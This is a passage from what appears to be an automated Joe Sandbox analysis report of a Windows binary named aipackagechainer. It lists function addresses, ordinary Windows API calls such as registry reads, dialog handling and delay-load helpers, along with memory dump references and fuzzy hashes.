Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Strings

$w-, xrefs: 00279866

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: $w-
API String ID: 697777088-3852764266
Opcode ID: 79f8491cd14b89916669a3828da46fba304a6f7e7fc6bd0059c34fd81a54febc
Instruction ID: c375b6b227abec2f2041377c47bfae39fc87075226ea78db176f56c4cd27ad48
Opcode Fuzzy Hash: 79f8491cd14b89916669a3828da46fba304a6f7e7fc6bd0059c34fd81a54febc
Instruction Fuzzy Hash: A3B012A137C200AD3104A1882D03C37018CC1D3F10330C51BF00DC1240F4A45CF20432

Function 00279870 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Strings

(w-, xrefs: 00279870

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: (w-
API String ID: 697777088-3971906830
Opcode ID: 06db29b854cf25e3554e1baaa0b4f2ec5d32378697bf1cee8f4c510924f179e5
Instruction ID: eb417b4f8dbf1505420f7d6db2db0d9ebec09573f916aec87c35b8ebf4ee1716
Opcode Fuzzy Hash: 06db29b854cf25e3554e1baaa0b4f2ec5d32378697bf1cee8f4c510924f179e5
Instruction Fuzzy Hash: EAB0129127C300AD3104A1882C03C3B018CC1D2F10330C61BF00DC1240F4A45CF10432

Function 0027987A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Strings

,w-, xrefs: 0027987A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: ,w-
API String ID: 697777088-3954693586
Opcode ID: 076a01c7567dbe987de4972dcc6813104640dcac1df196d36eacacc020dd4aae
Instruction ID: 7128d51644a2f2625c64e2d16982c80d65b6ff83dda080970acabe57b141be44
Opcode Fuzzy Hash: 076a01c7567dbe987de4972dcc6813104640dcac1df196d36eacacc020dd4aae
Instruction Fuzzy Hash: CFB0129127C200AD3204A1982C03C37014CC1E2F50330C51BF40DC1240F4A45CF10432

Function 00279884 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Strings

0w-, xrefs: 00279884

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID: 0w-
API String ID: 697777088-4270559174
Opcode ID: 8c0f75916a91a348209b930f67ea5c7f900186f5c441293469bf37afc9d0b883
Instruction ID: 1e9ffc3004aa0507e3b892e99be0f37562ee369b995e446995cca832f653d9d7
Opcode Fuzzy Hash: 8c0f75916a91a348209b930f67ea5c7f900186f5c441293469bf37afc9d0b883
Instruction Fuzzy Hash: 47B012912BD200AD3104A1882C03C37010CC5C2F10330C51BF00DC1240F4A45CF14432

Function 0024C671 Relevance: 3.3, APIs: 2, Instructions: 267registryCOMMON

Download Yara Rule

APIs

RegEnumValueA.KERNELBASE(?,?,?,?,00000000,?,00000000,?,4938EAB5), ref: 0024C70E
RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?,?), ref: 0024C73A

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Part of subcall function 0021C3E0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,?,00246B79,?), ref: 0021C41D
Part of subcall function 0021C3E0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,00000000,00000000,00000000,00000000,00000000,?,?,00246B79,?), ref: 0021C44E
Part of subcall function 0021C3E0: WideCharToMultiByte.KERNEL32(00000003,00000000,00000002,?,?,00000000,00000000,00000000,?,?,00246B79,?), ref: 0021C485

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ByteCharEnumMultiValueWide$FindHeapProcessResource
String ID:
API String ID: 4070800961-0
Opcode ID: f564968099b32d7457255538f2164966c60d9f78e08d6b067058ad7b91c3f032
Instruction ID: 5551e015d8a14b4c006906b0d117919fe0acbbf977390e6dfd0c4a61aa5fefed
Opcode Fuzzy Hash: f564968099b32d7457255538f2164966c60d9f78e08d6b067058ad7b91c3f032
Instruction Fuzzy Hash: 3DA17F71901149DFDB05DFA8C884BAEBBB9FF49310F248169E915EB291DB349E04CFA1

Function 00258350 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 002583A2
EndDialog.USER32(00000000,00000001), ref: 002583B1

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: DialogWindow
String ID:
API String ID: 2634769047-0
Opcode ID: b872855bfd7bd55a63ff83a8fe9b312449d94c3607ca8ecf05e697dd801b4ef2
Instruction ID: 8d2b46179def8d5c40fcf01e850b8de8225dc68c78e1413082420ec965cd1cad
Opcode Fuzzy Hash: b872855bfd7bd55a63ff83a8fe9b312449d94c3607ca8ecf05e697dd801b4ef2
Instruction Fuzzy Hash: 6A617B7090174ADFD711CF68C948B5AFBF4FF49314F148299D849EB291DBB49A04CB91

Function 00248140 Relevance: 3.1, APIs: 2, Instructions: 65COMMON

Download Yara Rule

APIs

EnableWindow.USER32(?,00000000), ref: 002481B1

Part of subcall function 00257990: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 002579D4
Part of subcall function 00257990: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002579DF

Part of subcall function 00248410: GetDlgItem.USER32(?,00000002), ref: 00248430
Part of subcall function 00248410: GetWindowRect.USER32(00000000,?), ref: 00248446
Part of subcall function 00248410: ShowWindow.USER32(00000000,00000000,?,?,?,?,0024710A), ref: 0024845F
Part of subcall function 00248410: InvalidateRect.USER32(00000000,00000000,00000001,?,?,?,?,0024710A), ref: 0024846A
Part of subcall function 00248410: GetDlgItem.USER32(00000000,000003E9), ref: 0024847C
Part of subcall function 00248410: GetWindowRect.USER32(00000000,?), ref: 00248492
Part of subcall function 00248410: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,?,?,?,0024710A), ref: 002484D5

Part of subcall function 00248840: GetWindowLongW.USER32(?,000000F0), ref: 00248887
Part of subcall function 00248840: GetParent.USER32 ref: 0024889D
Part of subcall function 00248840: GetWindowRect.USER32(?,?), ref: 002488A8
Part of subcall function 00248840: GetParent.USER32(?), ref: 002488B0
Part of subcall function 00248840: GetClientRect.USER32(00000000,?), ref: 002488BF
Part of subcall function 00248840: GetClientRect.USER32(?,?), ref: 002488C8
Part of subcall function 00248840: MapWindowPoints.USER32(00000002,00000000,?,00000002), ref: 002488D4

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Rect$ClientItemMessageParentSend$EnableInvalidateLongPointsShow
String ID:
API String ID: 3283878059-0
Opcode ID: c352ea428cef51c9cba8d4e24f00dafe07286e1d99f8b9d64acee4ac6237494a
Instruction ID: 6a187d1eaed78d981b9918db1dd6baecda7f10cdf1ad138dca2813eed0dc7519
Opcode Fuzzy Hash: c352ea428cef51c9cba8d4e24f00dafe07286e1d99f8b9d64acee4ac6237494a
Instruction Fuzzy Hash: D211047662010A5BDB24AF08EC45BEA7794EB54320F004267FD09C7291DBB6EC72DBE5

Function 00257990 Relevance: 3.0, APIs: 2, Instructions: 41windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00237530: LoadLibraryW.KERNEL32(ComCtl32.dll,4938EAB5,?,00000008,00000008), ref: 0023756E
Part of subcall function 00237530: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 00237591
Part of subcall function 00237530: FreeLibrary.KERNEL32(00000000), ref: 0023760F

Part of subcall function 00237530: GetSystemMetrics.USER32(0000000C), ref: 002375CC
Part of subcall function 00237530: GetSystemMetrics.USER32(0000000B), ref: 002375E2
Part of subcall function 00237530: LoadImageW.USER32(?,?,00000001,00000000,00000000,?), ref: 002375F1

SendMessageW.USER32(?,00000080,00000001,00000000), ref: 002579D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 002579DF

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: LibraryLoadMessageMetricsSendSystem$AddressFreeImageProc
String ID:
API String ID: 852476325-0
Opcode ID: d494c93d93f526304fc01ee1df9fb886f3ee9a22c8ff6c149d7dd19c9e0e0524
Instruction ID: b587a79a6a29c58f6b66d913dcf226e25c5145ba10ae75ac82526d2fd02e0e20
Opcode Fuzzy Hash: d494c93d93f526304fc01ee1df9fb886f3ee9a22c8ff6c149d7dd19c9e0e0524
Instruction Fuzzy Hash: E6F0A07279431C37FA2021592C07F27B64DDB81B64F104266FE98AB2D2ECC27C1102D8

Function 00233CC0 Relevance: 2.6, APIs: 2, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,?,00240ECD,002BED9C,?,?,?,?,00000000), ref: 00233CD8
MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,4938EAB5,-00000001,?,?,?,00240ECD,002BED9C,?,?,?,?,00000000), ref: 00233D0A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 1a903fd68e90ea4dfb6fe08fb402de91b5819773ff1501e7a84a32e7cf2877c0
Instruction ID: c12256571dc89b9beab9672169db29ffcc4c242cb5c8088a77651e4333a51bb6
Opcode Fuzzy Hash: 1a903fd68e90ea4dfb6fe08fb402de91b5819773ff1501e7a84a32e7cf2877c0
Instruction Fuzzy Hash: B5014931311116AFD610DB48EC99F5EB755FF94361F208129F215EB2D0CF706E228BA0

Function 00229960 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000000,4938EAB5,?,?,0029FB9D,000000FF), ref: 00229994

Part of subcall function 002273D0: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 002274D3

Part of subcall function 0027B22D: GetCurrentThreadId.KERNEL32 ref: 0027B239
Part of subcall function 0027B22D: __Mtx_unlock.LIBCPMT ref: 0027B278
Part of subcall function 0027B22D: __Cnd_broadcast.LIBCPMT ref: 0027B280

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Cnd_broadcastCurrentFolderInitializeMtx_unlockPathThread
String ID:
API String ID: 3188518339-0
Opcode ID: 1e7f4aca82859a0907451d2a318ce596b847e1726af1eb0542bc81c6cd874470
Instruction ID: a0dcd00ec19ca124cf446a88216d6c4691377e29a40e513bfd74958148ee5c04
Opcode Fuzzy Hash: 1e7f4aca82859a0907451d2a318ce596b847e1726af1eb0542bc81c6cd874470
Instruction Fuzzy Hash: 0021E131A14714AFD720DFA4EC46F5AB7E8EF08720F10856AFD66DB690D770A810CB90

Function 0024C460 Relevance: 1.5, APIs: 1, Instructions: 46registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,?,00000000,00020019,0000000C), ref: 0024C4D2

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: eb4ff4e3b22ce47af4e43a05880bf2ea41791ef2d2df3cd1c654fd704b3fe898
Instruction ID: 2b00a19148ba7a41fc742ae2bfa7cd1a5a153cd4a7ecf3921aae949adf528ae7
Opcode Fuzzy Hash: eb4ff4e3b22ce47af4e43a05880bf2ea41791ef2d2df3cd1c654fd704b3fe898
Instruction Fuzzy Hash: 44019EB1900648AFE710DF48DC05B9AFBF8FB05720F10826AE81497391E7B56D10CB90

Function 0024FDD1 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

EndDialog.USER32(?,00000002), ref: 0024FE03

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Dialog
String ID:
API String ID: 1120787796-0
Opcode ID: ce1041a3838897a1b5848b863e32b8c56afde6f00f6f375db09ed041ab0da2fd
Instruction ID: 60f60477cd84d047b10701e8b03b23151d1d3a2dbcf5b043d2543ceacaf82fd8
Opcode Fuzzy Hash: ce1041a3838897a1b5848b863e32b8c56afde6f00f6f375db09ed041ab0da2fd
Instruction Fuzzy Hash: F9F04F70515301EFDB389F24EA09F66BBA1FF45709F15896CE496076A1CB71E812CF41

Function 0028DCB7 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0028D174,00000001,00000364,00000000,00000006,000000FF,?,00286E8D,00000000,?,?,0024F90D), ref: 0028DCF8

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8891d74fcc6f3e9721c5fec45aba06f3a89fb0503e79c21e3a2c060fb8a87d49
Instruction ID: 4dc6d4c536d676be9f83bf8a832d01dac3e53ba7e303e425f3741b0c9e0e872c
Opcode Fuzzy Hash: 8891d74fcc6f3e9721c5fec45aba06f3a89fb0503e79c21e3a2c060fb8a87d49
Instruction Fuzzy Hash: DFF0B43A62752566DF213F36DC05F5A3748AB81770B158012E814EA1C1CEB0EC24D7A0

Function 00213200 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0027DD5E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,80004005,4938EAB5,?,00000000), ref: 0027DDBE

RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AllocateExceptionHeapRaise
String ID:
API String ID: 3789339297-0
Opcode ID: e08c01ebbf2b6387c6a592dd5928cc961f5f45668996d5cb706d99ad67424ede
Instruction ID: 4f4d8c6d4992ea0b710589de973756a8e75d2bcec231734890b0de3be9eb4d9e
Opcode Fuzzy Hash: e08c01ebbf2b6387c6a592dd5928cc961f5f45668996d5cb706d99ad67424ede
Instruction Fuzzy Hash: 5BF0A731644648FFCB01DF54EC06F56FBA8FB09B10F00862EF91992691DB36A920CA44

Function 00279820 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 3a20f9cc6be9d92917a7c85d5da8117a1f8f14115c13b3f4e13b805e284dc0ba
Instruction ID: 06baeb07caebe3efb2d08cd22266a415bc19c9534adc7463b2403d1abe457f08
Opcode Fuzzy Hash: 3a20f9cc6be9d92917a7c85d5da8117a1f8f14115c13b3f4e13b805e284dc0ba
Instruction Fuzzy Hash: 7DB0129127C300AD3104A1886C03C37015CC1C2F10330C61BF00DC1240F4A45CF10432

Function 0027982A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 214d87c6d6a93ffeb6de27894095331f7ab68f6e6e8ba21e9b94cbceabe9a993
Instruction ID: b1b326c5f5bc46d38c1a8860f083923cf5cede58309f5b531feaf76dbc1274ae
Opcode Fuzzy Hash: 214d87c6d6a93ffeb6de27894095331f7ab68f6e6e8ba21e9b94cbceabe9a993
Instruction Fuzzy Hash: 09B0129127C200AD3104A1882C03C37022CC1C2F10330C51BF40DC1280F4A45CF10432

Function 00279834 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: a858167e4930ab67363dddd245c765d098fcfa35ff0ee5561b444fcd628d66f5
Instruction ID: 8bf51b57813d7e1ef36af972b9c831b62d19b2670aab25555d304c7632c7011e
Opcode Fuzzy Hash: a858167e4930ab67363dddd245c765d098fcfa35ff0ee5561b444fcd628d66f5
Instruction Fuzzy Hash: E7B0129127C200AD3104A1882C03C37010CC1C2F10330DD1BF40DC1280F4A45CF14532

Function 0027983E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00279817

Part of subcall function 00279B6C: DloadAcquireSectionWriteAccess.DELAYIMP ref: 00279B77
Part of subcall function 00279B6C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00279BDF
Part of subcall function 00279B6C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00279BF0

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

